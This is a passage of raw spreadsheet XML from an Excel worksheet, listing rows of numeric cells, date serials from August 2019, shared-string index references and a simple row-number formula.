      </c>
      <c r="B13621">
        <v>3620</v>
      </c>
      <c r="C13621" t="s">
        <v>19637</v>
      </c>
      <c r="D13621" s="1">
        <v>43706</v>
      </c>
      <c r="F13621" t="s">
        <v>10526</v>
      </c>
      <c r="G13621" t="s">
        <v>23963</v>
      </c>
    </row>
    <row r="13622" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13622">
        <f t="shared" si="212"/>
        <v>13621</v>
      </c>
      <c r="B13622">
        <v>3621</v>
      </c>
      <c r="C13622" t="s">
        <v>19637</v>
      </c>
      <c r="D13622" s="1">
        <v>43685</v>
      </c>
      <c r="F13622" t="s">
        <v>10021</v>
      </c>
      <c r="G13622" t="s">
        <v>23964</v>
      </c>
    </row>
    <row r="13623" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13623">
        <f t="shared" si="212"/>
        <v>13622</v>
      </c>
      <c r="B13623">
        <v>3622</v>
      </c>
      <c r="C13623" t="s">
        <v>19637</v>
      </c>
      <c r="D13623" s="1">
        <v>43690</v>
      </c>
      <c r="E13623" t="s">
        <v>20488</v>
      </c>
      <c r="F13623" t="s">
        <v>10526</v>
      </c>
      <c r="G13623" t="s">
        <v>23965</v>
      </c>
    </row>
    <row r="13624" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13624">
        <f t="shared" si="212"/>
        <v>13623</v>
      </c>
      <c r="B13624">
        <v>3623</v>
      </c>
      <c r="C13624" t="s">
        <v>19637</v>
      </c>
      <c r="D13624" s="1">
        <v>43679</v>
      </c>
      <c r="E13624" t="s">
        <v>19680</v>
      </c>
      <c r="F13624" t="s">
        <v>10021</v>
      </c>
      <c r="G13624" t="s">
        <v>23966</v>
      </c>
    </row>
    <row r="13625" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13625">
        <f t="shared" si="212"/>
        <v>13624</v>
      </c>
      <c r="B13625">
        <v>3624</v>
      </c>
      <c r="C13625" t="s">
        <v>19637</v>
      </c>
      <c r="D13625" s="1">
        <v>43680</v>
      </c>
      <c r="E13625" t="s">
        <v>23967</v>
      </c>
      <c r="F13625" t="s">
        <v>10526</v>
      </c>
      <c r="G13625" t="s">
        <v>23968</v>
      </c>
    </row>
    <row r="13626" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13626">
        <f t="shared" si="212"/>
        <v>13625</v>
      </c>
      <c r="B13626">
        <v>3625</v>
      </c>
      <c r="C13626" t="s">
        <v>19637</v>
      </c>
      <c r="D13626" s="1">
        <v>43692</v>
      </c>
      <c r="E13626" t="s">
        <v>19750</v>
      </c>
      <c r="F13626" t="s">
        <v>9978</v>
      </c>
      <c r="G13626" t="s">
        <v>23969</v>
      </c>
    </row>
    <row r="13627" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13627">
        <f t="shared" si="212"/>
        <v>13626</v>
      </c>
      <c r="B13627">
        <v>3626</v>
      </c>
      <c r="C13627" t="s">
        <v>19637</v>
      </c>
      <c r="D13627" s="1">
        <v>43681</v>
      </c>
      <c r="E13627" t="s">
        <v>19672</v>
      </c>
      <c r="F13627" t="s">
        <v>10021</v>
      </c>
      <c r="G13627" t="s">
        <v>23970</v>
      </c>
    </row>
    <row r="13628" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13628">
        <f t="shared" si="212"/>
        <v>13627</v>
      </c>
      <c r="B13628">
        <v>3627</v>
      </c>
      <c r="C13628" t="s">
        <v>19637</v>
      </c>
      <c r="D13628" s="1">
        <v>43687</v>
      </c>
      <c r="F13628" t="s">
        <v>10526</v>
      </c>
      <c r="G13628" t="s">
        <v>23971</v>
      </c>
    </row>
    <row r="13629" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13629">
        <f t="shared" si="212"/>
        <v>13628</v>
      </c>
      <c r="B13629">
        <v>3628</v>
      </c>
      <c r="C13629" t="s">
        <v>19637</v>
      </c>
      <c r="D13629" s="1">
        <v>43694</v>
      </c>
      <c r="E13629" t="s">
        <v>23972</v>
      </c>
      <c r="F13629" t="s">
        <v>10526</v>
      </c>
      <c r="G13629" t="s">
        <v>23973</v>
      </c>
    </row>
    <row r="13630" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13630">
        <f t="shared" si="212"/>
        <v>13629</v>
      </c>
      <c r="B13630">
        <v>3629</v>
      </c>
      <c r="C13630" t="s">
        <v>19637</v>
      </c>
      <c r="D13630" s="1">
        <v>43702</v>
      </c>
      <c r="E13630" t="s">
        <v>21895</v>
      </c>
      <c r="F13630" t="s">
        <v>10526</v>
      </c>
      <c r="G13630" t="s">
        <v>23974</v>
      </c>
    </row>
    <row r="13631" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13631">
        <f t="shared" si="212"/>
        <v>13630</v>
      </c>
      <c r="B13631">
        <v>3630</v>
      </c>
      <c r="C13631" t="s">
        <v>19637</v>
      </c>
      <c r="D13631" s="1">
        <v>43694</v>
      </c>
      <c r="F13631" t="s">
        <v>10526</v>
      </c>
      <c r="G13631" t="s">
        <v>23975</v>
      </c>
    </row>
    <row r="13632" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13632">
        <f t="shared" si="212"/>
        <v>13631</v>
      </c>
      <c r="B13632">
        <v>3631</v>
      </c>
      <c r="C13632" t="s">
        <v>19637</v>
      </c>
      <c r="D13632" s="1">
        <v>43690</v>
      </c>
      <c r="F13632" t="s">
        <v>9978</v>
      </c>
      <c r="G13632" t="s">
        <v>23976</v>
      </c>
    </row>
    <row r="13633" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13633">
        <f t="shared" si="212"/>
        <v>13632</v>
      </c>
      <c r="B13633">
        <v>3632</v>
      </c>
      <c r="C13633" t="s">
        <v>19637</v>
      </c>
      <c r="D13633" s="1">
        <v>43685</v>
      </c>
      <c r="E13633" t="s">
        <v>21111</v>
      </c>
      <c r="F13633" t="s">
        <v>10021</v>
      </c>
      <c r="G13633" t="s">
        <v>23977</v>
      </c>
    </row>
    <row r="13634" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13634">
        <f t="shared" si="212"/>
        <v>13633</v>
      </c>
      <c r="B13634">
        <v>3633</v>
      </c>
      <c r="C13634" t="s">
        <v>19637</v>
      </c>
      <c r="D13634" s="1">
        <v>43694</v>
      </c>
      <c r="E13634" t="s">
        <v>20347</v>
      </c>
      <c r="F13634" t="s">
        <v>9975</v>
      </c>
      <c r="G13634" t="s">
        <v>23978</v>
      </c>
    </row>
    <row r="13635" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13635">
        <f t="shared" ref="A13635:A13698" si="213">+ROW(A13634)</f>
        <v>13634</v>
      </c>
      <c r="B13635">
        <v>3634</v>
      </c>
      <c r="C13635" t="s">
        <v>19637</v>
      </c>
      <c r="D13635" s="1">
        <v>43694</v>
      </c>
      <c r="E13635" t="s">
        <v>19640</v>
      </c>
      <c r="F13635" t="s">
        <v>10021</v>
      </c>
      <c r="G13635" t="s">
        <v>23979</v>
      </c>
    </row>
    <row r="13636" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13636">
        <f t="shared" si="213"/>
        <v>13635</v>
      </c>
      <c r="B13636">
        <v>3635</v>
      </c>
      <c r="C13636" t="s">
        <v>19637</v>
      </c>
      <c r="D13636" s="1">
        <v>43687</v>
      </c>
      <c r="F13636" t="s">
        <v>10526</v>
      </c>
      <c r="G13636" t="s">
        <v>23980</v>
      </c>
    </row>
    <row r="13637" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13637">
        <f t="shared" si="213"/>
        <v>13636</v>
      </c>
      <c r="B13637">
        <v>3636</v>
      </c>
      <c r="C13637" t="s">
        <v>19637</v>
      </c>
      <c r="D13637" s="1">
        <v>43678</v>
      </c>
      <c r="E13637" t="s">
        <v>23981</v>
      </c>
      <c r="F13637" t="s">
        <v>10526</v>
      </c>
      <c r="G13637" t="s">
        <v>23982</v>
      </c>
    </row>
    <row r="13638" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13638">
        <f t="shared" si="213"/>
        <v>13637</v>
      </c>
      <c r="B13638">
        <v>3637</v>
      </c>
      <c r="C13638" t="s">
        <v>19637</v>
      </c>
      <c r="D13638" s="1">
        <v>43698</v>
      </c>
      <c r="E13638" t="s">
        <v>22692</v>
      </c>
      <c r="F13638" t="s">
        <v>10021</v>
      </c>
      <c r="G13638" t="s">
        <v>23983</v>
      </c>
    </row>
    <row r="13639" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13639">
        <f t="shared" si="213"/>
        <v>13638</v>
      </c>
      <c r="B13639">
        <v>3638</v>
      </c>
      <c r="C13639" t="s">
        <v>19637</v>
      </c>
      <c r="D13639" s="1">
        <v>43692</v>
      </c>
      <c r="F13639" t="s">
        <v>10526</v>
      </c>
      <c r="G13639" t="s">
        <v>23984</v>
      </c>
    </row>
    <row r="13640" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13640">
        <f t="shared" si="213"/>
        <v>13639</v>
      </c>
      <c r="B13640">
        <v>3639</v>
      </c>
      <c r="C13640" t="s">
        <v>19637</v>
      </c>
      <c r="D13640" s="1">
        <v>43689</v>
      </c>
      <c r="E13640" t="s">
        <v>19785</v>
      </c>
      <c r="F13640" t="s">
        <v>9975</v>
      </c>
      <c r="G13640" t="s">
        <v>23985</v>
      </c>
    </row>
    <row r="13641" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13641">
        <f t="shared" si="213"/>
        <v>13640</v>
      </c>
      <c r="B13641">
        <v>3640</v>
      </c>
      <c r="C13641" t="s">
        <v>19637</v>
      </c>
      <c r="D13641" s="1">
        <v>43695</v>
      </c>
      <c r="E13641" t="s">
        <v>23986</v>
      </c>
      <c r="F13641" t="s">
        <v>10526</v>
      </c>
      <c r="G13641" t="s">
        <v>23987</v>
      </c>
    </row>
    <row r="13642" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13642">
        <f t="shared" si="213"/>
        <v>13641</v>
      </c>
      <c r="B13642">
        <v>3641</v>
      </c>
      <c r="C13642" t="s">
        <v>19637</v>
      </c>
      <c r="D13642" s="1">
        <v>43698</v>
      </c>
      <c r="E13642" t="s">
        <v>21895</v>
      </c>
      <c r="F13642" t="s">
        <v>10526</v>
      </c>
      <c r="G13642" t="s">
        <v>23988</v>
      </c>
    </row>
    <row r="13643" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13643">
        <f t="shared" si="213"/>
        <v>13642</v>
      </c>
      <c r="B13643">
        <v>3642</v>
      </c>
      <c r="C13643" t="s">
        <v>19637</v>
      </c>
      <c r="D13643" s="1">
        <v>43708</v>
      </c>
      <c r="E13643" t="s">
        <v>19640</v>
      </c>
      <c r="F13643" t="s">
        <v>10021</v>
      </c>
      <c r="G13643" t="s">
        <v>23989</v>
      </c>
    </row>
    <row r="13644" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13644">
        <f t="shared" si="213"/>
        <v>13643</v>
      </c>
      <c r="B13644">
        <v>3643</v>
      </c>
      <c r="C13644" t="s">
        <v>19637</v>
      </c>
      <c r="D13644" s="1">
        <v>43702</v>
      </c>
      <c r="E13644" t="s">
        <v>19741</v>
      </c>
      <c r="F13644" t="s">
        <v>9975</v>
      </c>
      <c r="G13644" t="s">
        <v>23990</v>
      </c>
    </row>
    <row r="13645" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13645">
        <f t="shared" si="213"/>
        <v>13644</v>
      </c>
      <c r="B13645">
        <v>3644</v>
      </c>
      <c r="C13645" t="s">
        <v>19637</v>
      </c>
      <c r="D13645" s="1">
        <v>43692</v>
      </c>
      <c r="E13645" t="s">
        <v>23991</v>
      </c>
      <c r="F13645" t="s">
        <v>9978</v>
      </c>
      <c r="G13645" t="s">
        <v>23992</v>
      </c>
    </row>
    <row r="13646" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13646">
        <f t="shared" si="213"/>
        <v>13645</v>
      </c>
      <c r="B13646">
        <v>3645</v>
      </c>
      <c r="C13646" t="s">
        <v>19637</v>
      </c>
      <c r="D13646" s="1">
        <v>43680</v>
      </c>
      <c r="E13646" t="s">
        <v>19650</v>
      </c>
      <c r="F13646" t="s">
        <v>10021</v>
      </c>
      <c r="G13646" t="s">
        <v>23993</v>
      </c>
    </row>
    <row r="13647" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13647">
        <f t="shared" si="213"/>
        <v>13646</v>
      </c>
      <c r="B13647">
        <v>3646</v>
      </c>
      <c r="C13647" t="s">
        <v>19637</v>
      </c>
      <c r="D13647" s="1">
        <v>43693</v>
      </c>
      <c r="E13647" t="s">
        <v>19640</v>
      </c>
      <c r="F13647" t="s">
        <v>10021</v>
      </c>
      <c r="G13647" t="s">
        <v>23994</v>
      </c>
    </row>
    <row r="13648" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13648">
        <f t="shared" si="213"/>
        <v>13647</v>
      </c>
      <c r="B13648">
        <v>3647</v>
      </c>
      <c r="C13648" t="s">
        <v>19637</v>
      </c>
      <c r="D13648" s="1">
        <v>43692</v>
      </c>
      <c r="E13648" t="s">
        <v>23995</v>
      </c>
      <c r="F13648" t="s">
        <v>10021</v>
      </c>
      <c r="G13648" t="s">
        <v>23996</v>
      </c>
    </row>
    <row r="13649" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13649">
        <f t="shared" si="213"/>
        <v>13648</v>
      </c>
      <c r="B13649">
        <v>3648</v>
      </c>
      <c r="C13649" t="s">
        <v>19637</v>
      </c>
      <c r="D13649" s="1">
        <v>43693</v>
      </c>
      <c r="E13649" t="s">
        <v>23997</v>
      </c>
      <c r="F13649" t="s">
        <v>10526</v>
      </c>
      <c r="G13649" t="s">
        <v>23998</v>
      </c>
    </row>
    <row r="13650" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13650">
        <f t="shared" si="213"/>
        <v>13649</v>
      </c>
      <c r="B13650">
        <v>3649</v>
      </c>
      <c r="C13650" t="s">
        <v>19637</v>
      </c>
      <c r="D13650" s="1">
        <v>43701</v>
      </c>
      <c r="E13650" t="s">
        <v>21322</v>
      </c>
      <c r="F13650" t="s">
        <v>10021</v>
      </c>
      <c r="G13650" t="s">
        <v>23999</v>
      </c>
    </row>
    <row r="13651" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13651">
        <f t="shared" si="213"/>
        <v>13650</v>
      </c>
      <c r="B13651">
        <v>3650</v>
      </c>
      <c r="C13651" t="s">
        <v>19637</v>
      </c>
      <c r="D13651" s="1">
        <v>43699</v>
      </c>
      <c r="E13651" t="s">
        <v>21389</v>
      </c>
      <c r="F13651" t="s">
        <v>9975</v>
      </c>
      <c r="G13651" t="s">
        <v>24000</v>
      </c>
    </row>
    <row r="13652" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13652">
        <f t="shared" si="213"/>
        <v>13651</v>
      </c>
      <c r="B13652">
        <v>3651</v>
      </c>
      <c r="C13652" t="s">
        <v>19637</v>
      </c>
      <c r="D13652" s="1">
        <v>43706</v>
      </c>
      <c r="E13652" t="s">
        <v>24001</v>
      </c>
      <c r="F13652" t="s">
        <v>10021</v>
      </c>
      <c r="G13652" t="s">
        <v>24002</v>
      </c>
    </row>
    <row r="13653" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13653">
        <f t="shared" si="213"/>
        <v>13652</v>
      </c>
      <c r="B13653">
        <v>3652</v>
      </c>
      <c r="C13653" t="s">
        <v>19637</v>
      </c>
      <c r="D13653" s="1">
        <v>43678</v>
      </c>
      <c r="E13653" t="s">
        <v>19640</v>
      </c>
      <c r="F13653" t="s">
        <v>9975</v>
      </c>
      <c r="G13653" t="s">
        <v>24003</v>
      </c>
    </row>
    <row r="13654" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13654">
        <f t="shared" si="213"/>
        <v>13653</v>
      </c>
      <c r="B13654">
        <v>3653</v>
      </c>
      <c r="C13654" t="s">
        <v>19637</v>
      </c>
      <c r="D13654" s="1">
        <v>43692</v>
      </c>
      <c r="F13654" t="s">
        <v>10021</v>
      </c>
      <c r="G13654" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13655" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13655">
        <f t="shared" si="213"/>
        <v>13654</v>
      </c>
      <c r="B13655">
        <v>3654</v>
      </c>
      <c r="C13655" t="s">
        <v>19637</v>
      </c>
      <c r="D13655" s="1">
        <v>43687</v>
      </c>
      <c r="E13655" t="s">
        <v>24004</v>
      </c>
      <c r="F13655" t="s">
        <v>10021</v>
      </c>
      <c r="G13655" t="s">
        <v>24005</v>
      </c>
    </row>
    <row r="13656" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13656">
        <f t="shared" si="213"/>
        <v>13655</v>
      </c>
      <c r="B13656">
        <v>3655</v>
      </c>
      <c r="C13656" t="s">
        <v>19637</v>
      </c>
      <c r="D13656" s="1">
        <v>43699</v>
      </c>
      <c r="E13656" t="s">
        <v>24006</v>
      </c>
      <c r="F13656" t="s">
        <v>10021</v>
      </c>
      <c r="G13656" t="s">
        <v>24007</v>
      </c>
    </row>
    <row r="13657" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13657">
        <f t="shared" si="213"/>
        <v>13656</v>
      </c>
      <c r="B13657">
        <v>3656</v>
      </c>
      <c r="C13657" t="s">
        <v>19637</v>
      </c>
      <c r="D13657" s="1">
        <v>43705</v>
      </c>
      <c r="F13657" t="s">
        <v>10021</v>
      </c>
      <c r="G13657" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="13658" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13658">
        <f t="shared" si="213"/>
        <v>13657</v>
      </c>
      <c r="B13658">
        <v>3657</v>
      </c>
      <c r="C13658" t="s">
        <v>19637</v>
      </c>
      <c r="D13658" s="1">
        <v>43693</v>
      </c>
      <c r="F13658" t="s">
        <v>10526</v>
      </c>
      <c r="G13658" t="s">
        <v>24008</v>
      </c>
    </row>
    <row r="13659" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13659">
        <f t="shared" si="213"/>
        <v>13658</v>
      </c>
      <c r="B13659">
        <v>3658</v>
      </c>
      <c r="C13659" t="s">
        <v>19637</v>
      </c>
      <c r="D13659" s="1">
        <v>43707</v>
      </c>
      <c r="E13659" t="s">
        <v>19750</v>
      </c>
      <c r="F13659" t="s">
        <v>9978</v>
      </c>
      <c r="G13659" t="s">
        <v>24009</v>
      </c>
    </row>
    <row r="13660" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13660">
        <f t="shared" si="213"/>
        <v>13659</v>
      </c>
      <c r="B13660">
        <v>3659</v>
      </c>
      <c r="C13660" t="s">
        <v>19637</v>
      </c>
      <c r="D13660" s="1">
        <v>43700</v>
      </c>
      <c r="E13660" t="s">
        <v>19952</v>
      </c>
      <c r="F13660" t="s">
        <v>9978</v>
      </c>
      <c r="G13660" t="s">
        <v>24010</v>
      </c>
    </row>
    <row r="13661" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13661">
        <f t="shared" si="213"/>
        <v>13660</v>
      </c>
      <c r="B13661">
        <v>3660</v>
      </c>
      <c r="C13661" t="s">
        <v>19637</v>
      </c>
      <c r="D13661" s="1">
        <v>43687</v>
      </c>
      <c r="F13661" t="s">
        <v>10526</v>
      </c>
      <c r="G13661" t="s">
        <v>24011</v>
      </c>
    </row>
    <row r="13662" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13662">
        <f t="shared" si="213"/>
        <v>13661</v>
      </c>
      <c r="B13662">
        <v>3661</v>
      </c>
      <c r="C13662" t="s">
        <v>19637</v>
      </c>
      <c r="D13662" s="1">
        <v>43707</v>
      </c>
      <c r="F13662" t="s">
        <v>10021</v>
      </c>
      <c r="G13662" t="s">
        <v>24012</v>
      </c>
    </row>
    <row r="13663" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13663">
        <f t="shared" si="213"/>
        <v>13662</v>
      </c>
      <c r="B13663">
        <v>3662</v>
      </c>
      <c r="C13663" t="s">
        <v>19637</v>
      </c>
      <c r="D13663" s="1">
        <v>43683</v>
      </c>
      <c r="E13663" t="s">
        <v>19648</v>
      </c>
      <c r="F13663" t="s">
        <v>10021</v>
      </c>
      <c r="G13663" t="s">
        <v>24013</v>
      </c>
    </row>
    <row r="13664" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13664">
        <f t="shared" si="213"/>
        <v>13663</v>
      </c>
      <c r="B13664">
        <v>3663</v>
      </c>
      <c r="C13664" t="s">
        <v>19637</v>
      </c>
      <c r="D13664" s="1">
        <v>43693</v>
      </c>
      <c r="E13664" t="s">
        <v>24014</v>
      </c>
      <c r="F13664" t="s">
        <v>10021</v>
      </c>
      <c r="G13664" t="s">
        <v>24015</v>
      </c>
    </row>
    <row r="13665" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13665">
        <f t="shared" si="213"/>
        <v>13664</v>
      </c>
      <c r="B13665">
        <v>3664</v>
      </c>
      <c r="C13665" t="s">
        <v>19637</v>
      </c>
      <c r="D13665" s="1">
        <v>43693</v>
      </c>
      <c r="E13665" t="s">
        <v>19913</v>
      </c>
      <c r="F13665" t="s">
        <v>9975</v>
      </c>
      <c r="G13665" t="s">
        <v>24016</v>
      </c>
    </row>
    <row r="13666" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13666">
        <f t="shared" si="213"/>
        <v>13665</v>
      </c>
      <c r="B13666">
        <v>3665</v>
      </c>
      <c r="C13666" t="s">
        <v>19637</v>
      </c>
      <c r="D13666" s="1">
        <v>43683</v>
      </c>
      <c r="E13666" t="s">
        <v>19896</v>
      </c>
      <c r="F13666" t="s">
        <v>10021</v>
      </c>
      <c r="G13666" t="s">
        <v>24017</v>
      </c>
    </row>
    <row r="13667" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13667">
        <f t="shared" si="213"/>
        <v>13666</v>
      </c>
      <c r="B13667">
        <v>3666</v>
      </c>
      <c r="C13667" t="s">
        <v>19637</v>
      </c>
      <c r="D13667" s="1">
        <v>43683</v>
      </c>
      <c r="E13667" t="s">
        <v>19840</v>
      </c>
      <c r="F13667" t="s">
        <v>10021</v>
      </c>
      <c r="G13667" t="s">
        <v>24018</v>
      </c>
    </row>
    <row r="13668" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13668">
        <f t="shared" si="213"/>
        <v>13667</v>
      </c>
      <c r="B13668">
        <v>3667</v>
      </c>
      <c r="C13668" t="s">
        <v>19637</v>
      </c>
      <c r="D13668" s="1">
        <v>43693</v>
      </c>
      <c r="E13668" t="s">
        <v>19668</v>
      </c>
      <c r="F13668" t="s">
        <v>9978</v>
      </c>
      <c r="G13668" t="s">
        <v>24019</v>
      </c>
    </row>
    <row r="13669" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13669">
        <f t="shared" si="213"/>
        <v>13668</v>
      </c>
      <c r="B13669">
        <v>3668</v>
      </c>
      <c r="C13669" t="s">
        <v>19637</v>
      </c>
      <c r="D13669" s="1">
        <v>43692</v>
      </c>
      <c r="E13669" t="s">
        <v>15614</v>
      </c>
      <c r="F13669" t="s">
        <v>10021</v>
      </c>
      <c r="G13669" t="s">
        <v>24020</v>
      </c>
    </row>
    <row r="13670" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13670">
        <f t="shared" si="213"/>
        <v>13669</v>
      </c>
      <c r="B13670">
        <v>3669</v>
      </c>
      <c r="C13670" t="s">
        <v>19637</v>
      </c>
      <c r="D13670" s="1">
        <v>43688</v>
      </c>
      <c r="E13670" t="s">
        <v>19806</v>
      </c>
      <c r="F13670" t="s">
        <v>10526</v>
      </c>
      <c r="G13670" t="s">
        <v>24021</v>
      </c>
    </row>
    <row r="13671" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13671">
        <f t="shared" si="213"/>
        <v>13670</v>
      </c>
      <c r="B13671">
        <v>3670</v>
      </c>
      <c r="C13671" t="s">
        <v>19637</v>
      </c>
      <c r="D13671" s="1">
        <v>43680</v>
      </c>
      <c r="E13671" t="s">
        <v>19648</v>
      </c>
      <c r="F13671" t="s">
        <v>10021</v>
      </c>
      <c r="G13671" t="s">
        <v>24022</v>
      </c>
    </row>
    <row r="13672" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13672">
        <f t="shared" si="213"/>
        <v>13671</v>
      </c>
      <c r="B13672">
        <v>3671</v>
      </c>
      <c r="C13672" t="s">
        <v>19637</v>
      </c>
      <c r="D13672" s="1">
        <v>43691</v>
      </c>
      <c r="E13672" t="s">
        <v>19849</v>
      </c>
      <c r="F13672" t="s">
        <v>10021</v>
      </c>
      <c r="G13672" t="s">
        <v>24023</v>
      </c>
    </row>
    <row r="13673" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13673">
        <f t="shared" si="213"/>
        <v>13672</v>
      </c>
      <c r="B13673">
        <v>3672</v>
      </c>
      <c r="C13673" t="s">
        <v>19637</v>
      </c>
      <c r="D13673" s="1">
        <v>43682</v>
      </c>
      <c r="E13673" t="s">
        <v>24024</v>
      </c>
      <c r="F13673" t="s">
        <v>10526</v>
      </c>
      <c r="G13673" t="s">
        <v>24025</v>
      </c>
    </row>
    <row r="13674" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13674">
        <f t="shared" si="213"/>
        <v>13673</v>
      </c>
      <c r="B13674">
        <v>3673</v>
      </c>
      <c r="C13674" t="s">
        <v>19637</v>
      </c>
      <c r="D13674" s="1">
        <v>43688</v>
      </c>
      <c r="F13674" t="s">
        <v>10526</v>
      </c>
      <c r="G13674" t="s">
        <v>24026</v>
      </c>
    </row>
    <row r="13675" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13675">
        <f t="shared" si="213"/>
        <v>13674</v>
      </c>
      <c r="B13675">
        <v>3674</v>
      </c>
      <c r="C13675" t="s">
        <v>19637</v>
      </c>
      <c r="D13675" s="1">
        <v>43680</v>
      </c>
      <c r="E13675" t="s">
        <v>19896</v>
      </c>
      <c r="F13675" t="s">
        <v>10021</v>
      </c>
      <c r="G13675" t="s">
        <v>24027</v>
      </c>
    </row>
    <row r="13676" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13676">
        <f t="shared" si="213"/>
        <v>13675</v>
      </c>
      <c r="B13676">
        <v>3675</v>
      </c>
      <c r="C13676" t="s">
        <v>19637</v>
      </c>
      <c r="D13676" s="1">
        <v>43707</v>
      </c>
      <c r="E13676" t="s">
        <v>24028</v>
      </c>
      <c r="F13676" t="s">
        <v>9978</v>
      </c>
      <c r="G13676" t="s">
        <v>24029</v>
      </c>
    </row>
    <row r="13677" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13677">
        <f t="shared" si="213"/>
        <v>13676</v>
      </c>
      <c r="B13677">
        <v>3676</v>
      </c>
      <c r="C13677" t="s">
        <v>19637</v>
      </c>
      <c r="D13677" s="1">
        <v>43694</v>
      </c>
      <c r="E13677" t="s">
        <v>19650</v>
      </c>
      <c r="F13677" t="s">
        <v>10021</v>
      </c>
      <c r="G13677" t="s">
        <v>24030</v>
      </c>
    </row>
    <row r="13678" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13678">
        <f t="shared" si="213"/>
        <v>13677</v>
      </c>
      <c r="B13678">
        <v>3677</v>
      </c>
      <c r="C13678" t="s">
        <v>19637</v>
      </c>
      <c r="D13678" s="1">
        <v>43699</v>
      </c>
      <c r="E13678" t="s">
        <v>20488</v>
      </c>
      <c r="F13678" t="s">
        <v>10526</v>
      </c>
      <c r="G13678" t="s">
        <v>24031</v>
      </c>
    </row>
    <row r="13679" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13679">
        <f t="shared" si="213"/>
        <v>13678</v>
      </c>
      <c r="B13679">
        <v>3678</v>
      </c>
      <c r="C13679" t="s">
        <v>19637</v>
      </c>
      <c r="D13679" s="1">
        <v>43701</v>
      </c>
      <c r="E13679" t="s">
        <v>19640</v>
      </c>
      <c r="F13679" t="s">
        <v>9975</v>
      </c>
      <c r="G13679" t="s">
        <v>24032</v>
      </c>
    </row>
    <row r="13680" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13680">
        <f t="shared" si="213"/>
        <v>13679</v>
      </c>
      <c r="B13680">
        <v>3679</v>
      </c>
      <c r="C13680" t="s">
        <v>19637</v>
      </c>
      <c r="D13680" s="1">
        <v>43682</v>
      </c>
      <c r="F13680" t="s">
        <v>10526</v>
      </c>
      <c r="G13680" t="s">
        <v>24033</v>
      </c>
    </row>
    <row r="13681" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13681">
        <f t="shared" si="213"/>
        <v>13680</v>
      </c>
      <c r="B13681">
        <v>3680</v>
      </c>
      <c r="C13681" t="s">
        <v>19637</v>
      </c>
      <c r="D13681" s="1">
        <v>43703</v>
      </c>
      <c r="E13681" t="s">
        <v>24034</v>
      </c>
      <c r="F13681" t="s">
        <v>10526</v>
      </c>
      <c r="G13681" t="s">
        <v>24035</v>
      </c>
    </row>
    <row r="13682" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13682">
        <f t="shared" si="213"/>
        <v>13681</v>
      </c>
      <c r="B13682">
        <v>3681</v>
      </c>
      <c r="C13682" t="s">
        <v>19637</v>
      </c>
      <c r="D13682" s="1">
        <v>43706</v>
      </c>
      <c r="E13682" t="s">
        <v>19672</v>
      </c>
      <c r="F13682" t="s">
        <v>10021</v>
      </c>
      <c r="G13682" t="s">
        <v>24036</v>
      </c>
    </row>
    <row r="13683" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A13683">
        <f t="shared" si="213"/>
        <v>13682</v>
      </c>
      <c r="B13683">
        <v>3682</v>
      </c>
      <c r="C13683" t="s">
        <v>19637</v>
      </c>
      <c r="D13683" s="1">
        <v>43684</v>
      </c>
      <c r="E13683" t="s">
        <v>19640</v>
      </c>
      <c r="F13683" t="s">
